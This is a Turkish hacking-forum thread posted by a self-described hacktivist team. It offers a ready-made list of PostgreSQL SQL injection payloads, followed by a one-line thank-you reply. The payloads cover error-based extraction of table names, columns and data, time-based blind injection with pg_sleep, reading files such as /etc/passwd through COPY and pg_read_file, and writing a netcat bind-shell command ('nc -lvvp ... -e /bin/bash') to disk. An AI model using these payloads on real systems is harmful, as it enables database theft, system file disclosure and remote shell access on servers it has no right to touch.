Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: PostGreSQL Enjeksiyon Payload Örnekleri
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimiçi
Seviye Puanı: 56
Yaşam Puanı: 1,382 / 1,382
Deneyim: 30 / 100
Rep Sayısı: 2826
Mesaj Sayısı: 6456
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
PostGreSQL Enjeksiyon Payload Örnekleri
10.02.2019 14:47
# POSTGRESQL Injection Payload Örnekleri
***************************************
Author : KingSkrupellos
Team : Cyberizm Digital Security Team

## PostgreSQL Comments

Kod:
```sql
--
/**/  
```

## PostgreSQL Error Based - Basic

Kod:
```sql
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset​+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_​name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)|​|chr(126)+as+nUmeRiC)
```

## PostgreSQL Time Based

Kod:
```sql
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
```

## PostgreSQL File Read

Kod:
```sql
select pg_read_file('PG_VERSION', 0, 200);
```

```sql
CREATE TABLE temp(t TEXT);
COPY temp FROM '/etc/passwd';
SELECT * FROM temp limit 1 offset 0;
```

## PostgreSQL File Write

Kod:
```sql
CREATE TABLE pentestlab (t TEXT);
INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';
```
____________________________________________________

$$$$$$$$$$$$ THE END $$$$$$$$$$$$$$$

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti
#Ayar
*
avatar
Tabutçu
Durum: Çevrimdışı
Seviye Puanı: 35
Yaşam Puanı: 786 / 873
Deneyim: 95 / 100
Rep Sayısı: 1547
Mesaj Sayısı: 1860
Üyelik Tarihi: 13.08.2013
      
Yorum: #2
RE: PostGreSQL Enjeksiyon Payload Örnekleri
11.02.2019 11:42
Teşekkürler, Emeğine Sağlık Smile

Başka forumlarda üyeliğim bulunmamaktadır.
ayar
Alinti



1 Ziyaretçi